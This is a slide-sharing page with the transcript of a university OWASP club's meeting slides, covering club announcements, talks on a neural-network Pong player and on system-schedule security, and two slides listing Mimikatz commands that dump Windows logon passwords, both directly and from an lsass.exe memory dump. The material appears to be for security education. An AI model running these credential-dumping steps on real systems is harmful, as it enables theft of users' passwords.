uc yber meeting 18 if you re new
play

UC.yber Meeting 18 If Youre New! Join our Slack ucyber.slack.com - PowerPoint PPT Presentation

Aug 28, 2022 •281 likes •436 views

UC.yber Meeting 18 If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our committees: Content/Events ,

  1. UC.yber Meeting 18

  2. If You’re New! ● Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati ● OWASP Chapter ● Feel free to get involved with one of our committees: Content/Events , Finance, and Social Media Stay updated through our weekly emails ●

  3. Announcements ● We are getting 20 CHIPs for our members to use! ● Our server will be set up and running very soon! US Bank visit is now in the works! Late Summer or sometime in Fall. ● ● We attended an Embedded Systems Security talk in Dayton Monday ● UCRI wants to start research with us, also visit them ● September ~20th we will compete in PacketWars at UD , more info to come...

  7. Embedded System Tech Talks Opening Notes: Endpoint security is only ONE viewpoint on the problem ● ● Software/ Hardware developers are unknowingly leaving vulnerabilities in their systems Tech Talks: ● System Schedule Security Neural Network Example in “Pong” ● Airforce Autonomous Drone Surveillance ●

  8. 26 PB Neural Network Tech Talk (Pt. 1) PONG! Neural Network Player vs. Procedural Based Player ● At first, the NN player lost most of the time ● After millions of instances of the NN player learns the best 02 paths, the NN player would beat the PB player NN almost every time . . h o h U

  9. Neural Network Tech Talk (Pt. 2) Procedural Based Player If the ball is to the left, go left. If it is to the right, go right. ● Neural Network Player It learns which path is the best path ● ● You can go even further by “pruning” the data Research / Project ● This goes hand-in-hand with our project / research

  10. System Schedule Security (Pt. 1) ● How system schedules are usually hacked During “downtime” ○ ○ Hackers see the system schedule as blocks of digital signals Optimal way to hack a system schedule ● ○ During a “project” / “projects” ○ In increments How To Defend: ● ○ Randomize the system schedules Run a periodic “system check” over downtime ○

  11. System Schedule Security (Pt. 2)

  12. Mimikatz Password Stealing

  13. How to do it! Launch Mimikatz # Privilege::debug Output should be Privilege ‘20’ OK # sekurlsa::logonPasswords full

  14. How hackers do it... Open Task manager Go to Details and type lsass Right click lsass.exe and select Create Dump File Copy file location and navigate to the dump. Copy the dump to your mimikatz install folder. # sekurlsa::minidump lsass.dmp # sekurlsa::logonPasswords full

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

UC.yber; Meeting 25 Vulnerabilities and more! If Youre New! Join our Slack

UC.yber; Meeting 25 Vulnerabilities and more! If Youre New! Join our Slack

UC.yber; Meeting 25 Vulnerabilities and more! If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our

443 views • 15 slides
UC.yber; Meeting 24 Meet New Leadership and Wireshark If Youre New! Join our Slack

UC.yber; Meeting 24 Meet New Leadership and Wireshark If Youre New! Join our Slack

UC.yber; Meeting 24 Meet New Leadership and Wireshark If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of

502 views • 19 slides
UC.yber Meeting 17 Dumping Windows Credentials, Threat Intel, and more If Youre New!

UC.yber Meeting 17 Dumping Windows Credentials, Threat Intel, and more If Youre New!

UC.yber Meeting 17 Dumping Windows Credentials, Threat Intel, and more If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get

487 views • 6 slides
UC.yber; Meeting #2 Last Weeks Meeting We... Talked about our purpose and goals Explained

UC.yber; Meeting #2 Last Weeks Meeting We... Talked about our purpose and goals Explained

UC.yber; Meeting #2 Last Weeks Meeting We... Talked about our purpose and goals Explained OWASP Displayed our current leadership and filled open leadership roles Covered how to get involved Brainstormed fundraising

230 views • 9 slides
UC.yber; Meeting 3 Last Week... Discussed lab space and equipment donations Talked

UC.yber; Meeting 3 Last Week... Discussed lab space and equipment donations Talked

UC.yber; Meeting 3 Last Week... Discussed lab space and equipment donations Talked about Hackathon Team (REGISTER) Went over basic enigma machine history Set in motion getting a banner for fundraising events For Newcomers

196 views • 8 slides
UC.yber; Meeting 20 Announcements Tomorrow UCRI will be hearing out our research ideas IEEE

UC.yber; Meeting 20 Announcements Tomorrow UCRI will be hearing out our research ideas IEEE

UC.yber; Meeting 20 Announcements Tomorrow UCRI will be hearing out our research ideas IEEE Secure Development Conference (at MIT) apply by Aug 11th RAPIDS 2 under discussion as State faces funding problems Focus on HS outreach

338 views • 14 slides
UC.yber Meeting 12 WARGAMES! Last Week Discussed National Collegiate Cyber Defense

UC.yber Meeting 12 WARGAMES! Last Week Discussed National Collegiate Cyber Defense

UC.yber Meeting 12 WARGAMES! Last Week Discussed National Collegiate Cyber Defense Competition Planned out what we need for becoming an official chapter Planned out our visit to Loveland HS Received a donation! Thanks to

1.11k views • 9 slides
TAEKWONDO Fundamental knowledge of physiology, biomechanics, dietetics coming together

TAEKWONDO Fundamental knowledge of physiology, biomechanics, dietetics coming together

WELCOME ! W ELCOME ELCOME TO TO THE THE H H WASHIN WASHIN C C YBER YBER U NIVERSITY NIVERSITY I I NTERNATIONAL NTERNATIONAL T T AEKWONDO AEKWONDO D EPARTMENT EPARTMENT ! Movie industry and widely media-covered combat sports events have spread

285 views • 15 slides
The Future of Cyber Experimentation and Testing T he U.S. NAT I O NAL C YBER RANG E

The Future of Cyber Experimentation and Testing T he U.S. NAT I O NAL C YBER RANG E

s The Future of Cyber Experimentation and Testing T he U.S. NAT I O NAL C YBER RANG E Michael VanPutte, Ph.D. Program Manager Distribution Statement A (Approved for Public Release, Distribution Unlimited #14014) DISCLAIMER: The

319 views • 11 slides
What i is cyb yber resilienc ence? e? Aaron Clark-Ginsberg Center for International Security

What i is cyb yber resilienc ence? e? Aaron Clark-Ginsberg Center for International Security

What i is cyb yber resilienc ence? e? Aaron Clark-Ginsberg Center for International Security and Cooperation, Stanford University 2017 Frontiers in Resilience Symposium Word cloud created from texts analyzed for this study This material

360 views • 35 slides
Cyb yber er Sec ecurity rity @ UN @ UNC Industr stry y Based ed Broadening dening

Cyb yber er Sec ecurity rity @ UN @ UNC Industr stry y Based ed Broadening dening

Cyb yber er Sec ecurity rity @ UN @ UNC Industr stry y Based ed Broadening dening Information rmation Operat rations ns Denni nis s Schmid idt Assistant Vice Chancellor for Information Security and Privacy and Chief Information

624 views • 38 slides
UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is

UC.yber; OWASP Chapter The University of Cincinnati's Official Cybersecurity Chapter What is OWASP? Open Web Application Security Project Non-profit organization focused on improving security of software. They have some GREAT info on

372 views • 9 slides
UC.yber; News, Networking, Bash, and CTFs Announcements Robert Bathlter has reached out

UC.yber; News, Networking, Bash, and CTFs Announcements Robert Bathlter has reached out

UC.yber; News, Networking, Bash, and CTFs Announcements Robert Bathlter has reached out to Xavier High School we will be working to set up an event with them, THANKS! Alex reached out to Lakota East, THANKS! We now have lab

403 views • 14 slides
Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack

Cyber@UC Meeting 35 Exploit ALL the vulnerabilities! If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of

563 views • 11 slides
Cyber@UC Meeting 33 Katoolin, Special Project, and more... If Youre New! Join our Slack

Cyber@UC Meeting 33 Katoolin, Special Project, and more... If Youre New! Join our Slack

Cyber@UC Meeting 33 Katoolin, Special Project, and more... If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with

402 views • 18 slides
Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack

Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack

Cyber@UC Meeting 30 Metasploit and Armitage Basics If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our

408 views • 19 slides
BRINGING POSTGRES TOWARDS ZERO DOWNTIME MIGRATION Matthieu Rigal, EuroPython 2015, Bilbao INTRO

BRINGING POSTGRES TOWARDS ZERO DOWNTIME MIGRATION Matthieu Rigal, EuroPython 2015, Bilbao INTRO

BRINGING POSTGRES TOWARDS ZERO DOWNTIME MIGRATION Matthieu Rigal, EuroPython 2015, Bilbao INTRO Speaker: Matthieu Rigal, Frenchman living since 8 years in Berlin. 4 years using Python in Geo-informatics, since 3 years as a POS Data Backend

969 views • 13 slides
ZERO-DOWNTIME DATACENTER FAILOVERS (SWITCHING HOSTING PROVIDERS FOR YOUR 1.5TB MYSQL DATABASE FOR

ZERO-DOWNTIME DATACENTER FAILOVERS (SWITCHING HOSTING PROVIDERS FOR YOUR 1.5TB MYSQL DATABASE FOR

ZERO-DOWNTIME DATACENTER FAILOVERS (SWITCHING HOSTING PROVIDERS FOR YOUR 1.5TB MYSQL DATABASE FOR DUMMIES) INTRO (WHO IS THIS GUY) migrating an entire company's infrastructure from Rackspace to AWS 60 virtual machines 3 baremetal boxes (db)

455 views • 45 slides
Functional System Simulation with SimuBoost GI Fachgruppentreffen Betriebssysteme (BS) 2016 Marc

Functional System Simulation with SimuBoost GI Fachgruppentreffen Betriebssysteme (BS) 2016 Marc

Towards Scalable Parallelization of Functional System Simulation with SimuBoost GI Fachgruppentreffen Betriebssysteme (BS) 2016 Marc Rittinghaus , Frank Bellosa OPERATING SYSTEMS GROUP DEPARTMENT OF COMPUTER SCIENCE Virtualization Node

429 views • 31 slides
Availability Knob Flexible User-Defined Availability in the Cloud Mohammad Shahrad and David

Availability Knob Flexible User-Defined Availability in the Cloud Mohammad Shahrad and David

Availability Knob Flexible User-Defined Availability in the Cloud Mohammad Shahrad and David Wentzlaff October 5, 2016 IaaS Providers and Availability Guarantees One thing in common: Fixed 99.95% availability! 2 Whats wrong with fixed

631 views • 31 slides
PostgresOpen 12 September 2019 1 Speaker Julien Riou DBA since 2012 Tech lead in

PostgresOpen 12 September 2019 1 Speaker Julien Riou DBA since 2012 Tech lead in

https://knowyourmeme.com/memes/all-the-things PostgresOpen 12 September 2019 1 Speaker Julien Riou DBA since 2012 Tech lead in the databases team at OVH since 2015 pgterminate @ github Speaker PostgresOpen 12 September

1.24k views • 85 slides
Proof of Storage Time: Efficiently Checking Continuous Data Availability Gi Giuseppe At

Proof of Storage Time: Efficiently Checking Continuous Data Availability Gi Giuseppe At

Proof of Storage Time: Efficiently Checking Continuous Data Availability Gi Giuseppe At Ateniese Lo Long Chen hen Stevens Institute of Technology New Jersey Institute of Technology Mo Moham ammad ad Et Etemad ad Qi Qiang Ta Tang

563 views • 30 slides
Toward a cost model for system administration Alva Couch Ning Wu Hengky Susanto Tufts

Toward a cost model for system administration Alva Couch Ning Wu Hengky Susanto Tufts

Toward a cost model for system administration Alva Couch Ning Wu Hengky Susanto Tufts University LISA-2005 Tufts University couch@cs.tufts.edu Computer Science Executive Summary Cost of SA s includes e d u Tangible cost l c

718 views • 38 slides
Deploy Early, Deploy Often, Deploy Safely Andy Lowe From User Story to Production Feature

Deploy Early, Deploy Often, Deploy Safely Andy Lowe From User Story to Production Feature

Deploy Early, Deploy Often, Deploy Safely Andy Lowe From User Story to Production Feature Basic Process Commit Automated UAT Deploy Write Some Acceptance Prod Tests Code Deploy Then Theres All The Other Stuff Staging Code

815 views • 33 slides

More recommend